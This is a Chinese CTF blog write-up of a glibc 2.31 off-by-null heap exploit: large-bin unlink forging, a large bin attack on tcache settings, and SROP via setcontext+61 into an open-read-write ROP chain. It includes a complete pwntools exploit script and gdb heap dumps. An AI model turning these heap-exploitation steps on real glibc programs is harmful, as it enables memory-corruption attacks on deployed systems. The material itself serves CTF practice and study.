glibc2.31 off-by-null orw 攻击手法刨析

最新推荐文章于 2022-09-08 10:36:23 发布
最新推荐文章于 2022-09-08 10:36:23 发布
阅读量843 收藏 2
点赞数 1
分类专栏: CTF PWN 文章标签: 深度学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119938623
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

前言:复习一下glibc2.31版本的orw手法,largebin的残留信息进行unlik,随便弄个题来写的刨析,嘿嘿,
仅large bin chunk的堆块伪造,并即可实现堆块重叠
并large bin attack 任意写攻击TLS结构体中的存放tcache结构体指针的位置,从而可以伪造tcache bin结构体进行任意构造
再通过上述demo任意写控制参数,从而在assert后即可进行栈迁移

glibc2.31 off-by-null orw 攻击手法刨析

Free(3) 3---->unsortbin

free(5) 5-------->unsortbin

unsrotbin:5:3 5 fd:chunk 3 addr 3 bk addr:chunk 5

free(9) 9------>unsortbin

unsortbin:9-5-3 9 fd:chunk 5addr 5 bk:chunk 9 addr fd:chunk 3 3 bk:chunk 5 addr

New(0x2000,'maxbos') #3 遍历unsortbin 没有复合的size,所以将unsrotbin的chunk放到largebin,都有bk_nextsize 和fd_nextsize

chunk 9:Free chunk (largebins) | PREV_INUSE
Addr: 0x55bdf2755840
Size: 0x521
fd: 0x55bdf2755000
bk: 0x7f8917b7a030
fd_nextsize: 0x55bdf2755000
bk_nextsize: 0x55bdf27549f0

chunk 5:Free chunk (largebins) | PREV_INUSE
Addr: 0x55bdf2755000
Size: 0x511
fd: 0x55bdf27549f0
bk: 0x55bdf2755840
fd_nextsize: 0x55bdf27549f0
bk_nextsize: 0x55bdf2755840

chunk 3:Addr: 0x55bdf27549f0
Size: 0x501
fd: 0x7f8917b7a030
bk: 0x55bdf2755000
fd_nextsize: 0x55bdf2755840
bk_nextsize: 0x55bdf2755000

largebins:9 fd:chunk 5 addr fd_nextsize:chunk 5 addr bk_nextsize:chunk 3 addr 5 fd:chunk 3 addr bk:chunk 5 addr ,fd_nextsize: chunk3 addr bk_next_size : chunk 9addr 3fd:mainarena bk:chunk 5addr fd_nextsize:chunk 9 addr bk_nextsize:chunk 5addr

free(3) #0x2000 overlap to top_chunk

New(0x500,'x00'*8+p64(0xE61)) # chunk 5(3) 构造unlink 检测的条件 (这里申请的遍历是遍历fd_nextsize)

0x55ba98c95000: 0x0000000000000000 0x0000000000000511
0x55ba98c95010: 0x0000000000000000 0x0000000000000e61
0x55ba98c95020: 0x000055ba98c949f0 0x000055ba98c95840
0x55ba98c95030: 0x0000000000000000 0x0000000000000000

New(0x4F0,'x00'*8+'x10x00') #5 构造unluink

0x55ffbade79f0: 0x0000000000000000 0x0000000000000501
0x55ffbade7a00: 0x0000000000000000 0x000055ffbade0010
0x55ffbade7a10: 0x000055ffbade8840 0x000055ffbade8840

free(11) #11---->unsortbin

New(0x800,'maxbos') #9 chunk 11--->larbin

Free chunk (largebins) | PREV_INUSE
Addr: 0x559fb0d15e70
Size: 0x501
fd: 0x7f9141f83030
bk: 0x559fb0d15840
fd_nextsize: 0x559fb0d15840
bk_nextsize: 0x559fb0d15840

Free chunk (largebins) | PREV_INUSE
Addr: 0x559fb0d15840
Size: 0x521
fd: 0x559fb0d15e70
bk: 0x7f9141f83030
fd_nextsize: 0x559fb0d15e70
bk_nextsize: 0x559fb0d15e70

largebins: chunk9 fd:chunk 11addr bk:mainarena fd_nextsize:chunk 9 bk_nextsize:chunk 9 chunk 11 fd:mainarena bk:chunk9 addr fd_next_size:chunk 9 addr bk_nextsize:chunk 9 addr

Free(9) #overlap top_chunk

New(0x510,'x10x00') #9 构造unlink条件

New(0x4F0,'x00'*0x20) #11 情况残留下的信息

free(10) #前向合并

0x55ba98c95000: 0x0000000000000000 0x0000000000000511
0x55ba98c95010: 0x0000000000000000 0x0000000000000e61
0x55ba98c95020: 0x000055ba98c949f0 0x000055ba98c95840
0x55ba98c95030: 0x0000000000000000 0x0000000000000000

0x55ffbade79f0: 0x0000000000000000 0x0000000000000501
0x55ffbade7a00: 0x0000000000000000 0x000055ffbade0010
0x55ffbade7a10: 0x000055ffbade8840 0x000055ffbade8840

unlink绕过机制:chunk 10的presize 为e60,向前检测,检测在0x55ba98c95010的size有0xe61于是准备合并到这个地方,由于glibc源码中有unlink检测我们需要绕过,绕过机制:p----fd---bk==p, p->bk->fd == p以及prevsize == size,绕过就可以unlink合并了

New(0x4F0,'maxbos') #10 ---->5 --6 overlap

0x563ad4770000: 0x0000000000000000 0x0000000000000511
0x563ad4770010: 0x0000000000000000 0x0000000000000501
0x563ad4770020: 0x0000006f6278616d 0x00007ffa3ecdb230
0x563ad4770030: 0x0000563ad4770010 0x0000563ad4770010

New(0x1000,'maxbos') #largebin

Show(6)

libc_base = u64(p.recvuntil('x7F')[-6:].ljust(8,'x00')) - 1648 - 0x10 - libc.sym['__malloc_hook']
log.info('libc_base:'+hex(libc_base))
Show(9) 
heap_base = u64(p.recv(6).ljust(8,'x00')) - 0x49F0

New(0x130,'x00'*0x108 + p64(0x4B1)) #14----overlap 7 size 能接下来覆盖chunk的内容

New(0x440,'maxbos') #15

New(0x8B0,'\x00'*0x20 + p64(0x21)*8) #16 剩余的申请完

New(0x430,'maxbos') #17

New(0x108,'maxbos') #18

free(15) #15---unsrotbin

New(800,'mm') #15 -largetbin

free(15) #overlap top_chunk

free(7) #7 unsortbin

0x5615ed7f0620: 0x0000000000000000 0x00000000000004b1
0x5615ed7f0630: 0x00007f9a32655c00 0x00007f9a32655c00
0x5615ed7f0640: 0x0000000000000000 0x0000000000000000
0x5615ed7f0650: 0x0000000000000000 0x0000000000000451
0x5615ed7f0660: 0x00007f9a32656000 0x00007f9a32656000
0x5615ed7f0670: 0x00005615ed7f0650 0x00005615ed7f0650

New(0x4A0,'x00'0x28 + p64(0x451) + p64(main_arena + 1120)2 + p64(heap_base + 0x6650) + p64(magic - 0x20)) #利用largebin attack修改掉mp_.tcache_bins与mp_.tcache_max_bytes,“拓 展”tcache struct

0x55b77feb0620: 0x0000000000000000 0x00000000000004b1
0x55b77feb0630: 0x0000000000000000 0x0000000000000000
0x55b77feb0640: 0x0000000000000000 0x0000000000000000
0x55b77feb0650: 0x0000000000000000 0x0000000000000451
0x55b77feb0660: 0x00007f700788c000 0x00007f700788c000
0x55b77feb0670: 0x000055b77feb1650 0x00007f7007893518 (fd_nextsize---bk)

在最新版的glibc 2.32里,我们看到,第二个分支里确实封堵了以前的利用手法,但是在第一个分支里,仍然可以实现large bin attack,但是该分支利用起来,只是完成往任意地址写一个堆地址的作用,因为这里的bck->bk才是我们的large bin,因此分析来看,我们能够控制的也就是图中第一个分支中的fwd->fd->bk_nextsize,而完成写的操作是在fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; 这句中,即可以往任意地址写上这个unsorted bin chunk堆的地址。而以前旧版large bin attack是可以往任意的两个地址写两个堆地址

pwndbg> x/20xg 0x7f2a33246518+0x20
0x7f2a33246538: 0x000055f999e12490 0x0000000000000000
0x7f2a33246548: 0x00007f2a3323eba0 0x0000000000000000
0x7f2a33246558: 0x0000000000000000 0x0000000000000000
0x7f2a33246568: 0x0000000000000000 0x0000000000000000

Free(17) #chunk 17-----》unsortbin

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x5646e23d2490
Size: 0x441
fd: 0x7f8cb4dbec00
bk: 0x7f8cb4dbec00

New(0x800,str(frame) + orw) #15

Free chunk (largebins) | PREV_INUSE
Addr: 0x557af40c2490 #17
Size: 0x441
fd: 0x7fd739593000
bk: 0x557af40c0650
fd_nextsize: 0x557af40c0650
bk_nextsize: 0x7fd73959a518

Free chunk (largebins) | PREV_INUSE
Addr: 0x557af40c0650 $15
Size: 0x451
fd: 0x557af40c2490
bk: 0x7fd739593000
fd_nextsize: 0x557af40c1650
bk_nextsize: 0x557af40c2490

lagebin:15(0x00007f700788c000 0x00007f700788c000
0x55b77feb0670: 0x000055b77feb1650 0x00007f7007893518)-17(bk_nextsize:0x7fd73959a518)

Free(15) #15 orw in topchunk

fwed=fd---bk_nextsize(写入)fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;

New(0x430,'maxbos') #17

Free(7)

New(0x4A0,'x00'0x30 + 'x01'0x90 + p64(libc_base + 0x1E54C0 + 0x60)0x10 + p64(libc_base + 0x1E48C0 + 0xA0)0x10)

libc_base + 0x1E54C0 + 0x60:_IO_file_jumps-------setcontext+61

libc_base + 0x1E48C0 + 0xA0:__libc_IO_vtables:orw

Free(0)

Free(1)

New(0x108,p64(libc_base + libc.sym['setcontext'] + 61))

New(0x208,str(frame)[0xA0:])
menu(1)

p.sendafter('Size:',str(0x428))

申请的时候可以jumps-----》setcontext+61------vatable(orw)

完整exp:

#coding:utf-8
from pwn import *
context.log_level='debug'
context.binary='./main'
 
def menu(ch):
    p.sendlineafter('>> ',str(ch))
 
def New(size,content):
    menu(1)
    p.sendlineafter("Size: ",str(size))
    p.sendafter('Content: ',content)
def Modify(index,content):
    menu(2)
    p.sendlineafter('Index: ',str(index))
    p.sendafter('Content: ',content)
 
def Show(index):
    menu(4)
    p.sendlineafter('Index: ',str(index))
 
def Free(index):
    menu(3)
    p.sendlineafter('Index: ',str(index))
 
libc=ELF("/home/root2/Desktop/glibc-all-in-one-master/libs/2.32-0ubuntu3_amd64/libc.so.6")
while True:
    p=process("./main")
    #p=remote("node2.hackingfor.fun",39502)
    try:
        New(0x2000,'maxbos') #0
        New(0x1000,'maxbos') #1
        New(0x2000-0x2F0-0x600,'maxbos') #2
        New(0x4F0,'maxbos') #3
        New(0x108,'maxbos') #4
        New(0x500,'maxbos') #5
        New(0x108,'maxbos') #6
        New(0x108,'maxbos') #7
        New(0x108,'maxbos') #8
        New(0x510,'maxbos') #9
        New(0x108,'maxbos') #10
        New(0x4F0,'maxbos') #11
        New(0x108,'maxbos') #12
        raw_input() 
        Free(3)
 
        Free(5)
        
        Free(9)   #9-5-3  unsortbin
        gdb.attach(p)  
        New(0x2000,'maxbos') #3   lagre bin chunk  fd_nextszie  bk_nextsize 
 
        Free(3)   #overlap topchunk
 
        New(0x500,'\x00'*8+p64(0xE61)) #chunk5   chunk3 bk ----->chunk5   #3
 
        New(0x4F0,'\x00'*8+'\x10\x00')  #5
 
        Free(11)
 
        New(0x800,'maxbos')  #9  chun11 large bin
 
        Free(9)
        New(0x510,'\x10\x00')  #9  0x....840   1/16
        
        New(0x4F0,'\x00'*0x20) #11  
        Modify(10,'\x00'*0x100+p64(0xE60))
 
        Free(11)  #overlap  chunk
 
        New(0x4F0,'maxbos')     #
        
        New(0x1000,'maxbos')
        
        Show(6)
        libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 1648 - 0x10 - libc.sym['__malloc_hook']
        log.info('libc_base:'+hex(libc_base))
        
        Show(9) 
        heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x49F0 
        
        log.info('HEAP:\t' + hex(heap_base))
        
        SROP_addr=heap_base+0x79F0
        log.info('SROP_addr:'+hex(SROP_addr))
        magic = libc_base + 0x1EB538
        log.info('magic:'+hex(magic))
        main_arena = libc_base + libc.sym['__malloc_hook'] + 0x10
        log.info("main_arena:"+hex(main_arena))
        pop_rdi_ret = libc_base + 0x000000000002858F 
        pop_rdx_r12 = libc_base + 0x0000000000114161 
        pop_rsi_ret = libc_base + 0x000000000002AC3F 
        pop_rax_ret = libc_base + 0x0000000000045580 
        syscall_ret = libc_base + 0x00000000000611EA 
        malloc_hook = libc_base + libc.sym['__malloc_hook']
        rsp=heap_base + 0x7A90 + 0x58
        log.info('rsp:'+hex(rsp))
        rip=pop_rdi_ret + 1
        log.info('rip:'+hex(rip))
        Open = libc_base + libc.symbols["open"]
        Read = libc_base + libc.symbols["read"]
        Write = libc_base + libc.symbols['write']
        frame = SigreturnFrame()
        frame.rsp = heap_base + 0x7A90 + 0x58
        frame.rip = pop_rdi_ret + 1
        orw=''
        orw+=p64(pop_rax_ret)+p64(2)
        orw += p64(pop_rdi_ret)+p64(heap_base + 0x7B78)
        orw += p64(pop_rsi_ret)+p64(0)
        orw += p64(syscall_ret)
        orw += p64(pop_rdi_ret) + p64(3)
        orw += p64(pop_rdx_r12) + p64(0x100) + p64(0)
        orw += p64(pop_rsi_ret) + p64(heap_base + 0x10000)
        orw += p64(Read)
        orw += p64(pop_rdi_ret)+p64(1)
        orw += p64(Write)
        orw += './flag.txt\x00\x00'
        #IO_helper_jumps = libc_base + 0x1E38C0
        New(0x130,'\x00'*0x108 + p64(0x4B1)) #14----overlap 7 size
 
        New(0x440,'maxbos') #15
 
        New(0x8B0,'\x00'*0x20 + p64(0x21)*8) #16
 
        New(0x430,'maxbos') #17
        New(0x108,'maxbos') #18
        Free(15)
 
        New(0x800,'maxbos')
        Free(15)
        Free(7)
 
        New(0x4A0,'\x00'*0x28 + p64(0x451) + p64(main_arena + 1120)*2 + p64(heap_base + 0x6650) + p64(magic - 0x20))
        
        Free(17)
 
        New(0x800,str(frame) + orw)   #15
        
        Free(15)   #15  orw  in topchunk
        New(0x430,'maxbos')
 
        Free(7)
        New(0x4A0,'\x00'*0x30 + '\x01'*0x90 + p64(libc_base + 0x1E54C0 + 0x60)*0x10 + p64(libc_base + 0x1E48C0 + 0xA0)*0x10)
        #libc_base + 0x1E54C0 + 0x60:_IO_file_jumps=libc.sym['setcontext'] + 61
        #libc_base + 0x1E48C0 + 0xA0:__libc_IO_vtables:orw
 
        Free(0)
 
        Free(1)
 
        New(0x108,p64(libc_base + libc.sym['setcontext'] + 61))
        
        New(0x208,str(frame)[0xA0:])
        menu(1) 
        p.sendafter('Size:',str(0x428))
        break
    except:
        p.close()
p.interactive()

jsjsj11123
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习打卡2:off-by-null
一点涵的博客
09-08 819
督促自己:2020-9-8 学习笔记: 《逆向工程权威指南上》12: 指令集架构:x86指令集架构(ISA),opcode长度不同;ARM指令集架构(精简指令集RISC),opcode相同,机器码都封装在4个字节里面(ARM模式),或封装在2个字节里面(Thumb模式) x/86: 函数返回值在eax中 使用“栈”结构存储上述返回地址 ARM: 使用LR寄存器存储函数结束的返回地址 BX LR 指令的作用就是跳转到返回地址 MIPS: 寄存器命名方式有两种:数字命名($0 ~ 31)和伪名称命名(
centos7升级glibc2.31.zip
11-12
tar xvf glibc-2.31.tar.xz cd glibc-2.31 mkdir build cd build ../configure --prefix=/usr --enable-kernel=3.2 --with-headers=/usr/include --sysconfdir=/etc make sudo make install ``` **6. 创建符号链接*...
【八芒星计划】 OFF BY NULL
carol2358的博客
08-31 931
八芒星计划是我为了加深自己对于pwn各种题型的理解发起的,我会将平时遇到的题型相似的题目放在同一篇文章里,方便自己和他人查阅,同时也可能会录制相关的视频,来加深自己的映像,并且把知识点更细致地讲述给大家。 这一篇全部记录off by null 文章目录2019-BALSN-CTF-plaintext 2019-BALSN-CTF-plaintext 【2.29的off by null,借助large bin的会留下指向自己的指针的特性,来伪造fake chunk,达成off by null】 本题进行
高版本libc下的off by null
weixin_45209963的博客
09-08 1758
新版额外检查这个chunk size与被free掉的chunk的prev size是否相等,chunk overlap必须要伪造后者,而前者不可控,故一般打法失效。,通过大循环将这三个chunk全部放入同一个large bins。此时由于large bins机制,中间大小的chunk的。均相同,分别指向比自己小/大的chunk,将该chunk取下,同时伪造好。),残留指针为头节点libc指针,此时需要申请到该chunk,再申请一个。的size,再将该chunk的bk取下并写其fd为该chunk(伪造。
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1280
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
【八芒星计划】 ORW
carol2358的博客
09-01 3926
本篇用来记录ORWORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
glibc-2.17-260.zip
09-26
glibc-2.17-260.el7.x86_64 glibc-common-2.17-260.el7.x86_64 glibc-devel-2.17-260.el7.x86_64 glibc-headers-2.17-260.el7.x86_64
glibc-2.31 和 sgerrand.rsa.pub
11-04
标题 "glibc-2.31 和 sgerrand.rsa.pub" 涉及到的是 Linux 系统中的一个关键组件——GNU C 库(Glibc)的更新版本及其相关安全证书。Glibc 是 GNU 项目的一部分,是 Linux 和其他类 UNIX 系统上最常用的 C 库,为...
glibc-2.28-127.el8.x86_64.rpm
06-10
glibc-2.28
glibc-common-2.17-317.el7.x86_64.rpm
07-06
glibc-common-2.17-317
【CTF】【PWN】orw
m0_50819561的博客
10-09 1309
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 1863
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙盒机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
[off by null + tcache dup]lctf_easy_heap
huzai9527的博客
05-17 238
[off by null + tcache dup]lctf_easy_heap 1.ida 分析 malloc函数中输入content存在off by null 2.思路 通过off by null,造成chunk overlapping,泄漏Libc的地址 这里存在off by null 通过unstored bin就可以泄漏,但由于tcache的存在,需要注意 先申请10个chunk,释放3-9,填满tcache bin之后,再释放0,1,2编号的chunk进入unstored bin
PWN-PRACTICE-BUUCTF-1
P1umH0的博客
07-04 176
PWN-PRACTICE-BUUCTF-1
ciscn 2022 华东北分区赛pwn bigduck
z1r0的博客
07-01 714
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
堆上的orw
Stella_Leo的博客
08-24 1582
author: moqizou 堆上的orw 最近出的堆题大都转向了沙箱,需要orw,而在堆上面的orw就需要去布局,如何才能让系统执行我们的代码就成了一个难题,下面是学习的一些总结 libc2.27 这一段是setcontext函数的下面部分,不难发现,通过rdi和偏移,几乎控制了所有的寄存器,所以如果控制setcontext函数的参数也就是rdi就可以控制程序流程,而这里的这样也就可以让堆上的代码可以执行。 一般的套路 一般来说,可以拿到libc_base和heap_base。拿到之后,构造.
使用 setcontext 类函数实现 mini 协程库
Tattoo的博客
12-20 1868
协程实现原理 协程的本质都是通过修改 ESP 和 EIP 指针来实现的。其理论上还是单线程在运行. 程序在CPU上运行时依赖3个寄存器: ESP寄存值指向当前栈顶地址,指向当前指令需要的数据 EBP指向当前活动栈帧的基地址 指令寄存器IP,指向当前需要运行的指令 实现协程的多种方法 利用 glibc 的 ucontext 组件(云风的库) 使用汇编来切换上下文(实现miniC协程,腾讯lib...
2.29leak off by null&&orw
qq_33590156的博客
12-04 2897
2.29版本下加了check,除了基本unlink检测还加上了判定presize和size相不相等的检测,这让之前的向前合并unlink夹chunk的思路变得不可行, 所以要利用就得结合fastbin smallbin largebin的残留指针,去构造unlink。 但这个题它可以直接leak堆上的残留指针,所以可以获取到heap地址,之后可以将heap指针(地址)p放在堆上构造fd = &p-0x18,bk = &p-0x10通过unlink检测 heap11_addr = heap_
off by null 小结
qq_43409582的博客
11-20 3297
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于堆块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
centos 7.4安装glibc-2.31
最新发布
09-07
要在CentOS 7.4上安装glibc-2.31,您需要遵循以下步骤: 1. 确保您的系统已经安装了必要的开发工具和依赖项。您可以通过运行以下命令来安装它们: ``` sudo yum groupinstall "Development Tools" sudo yum ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值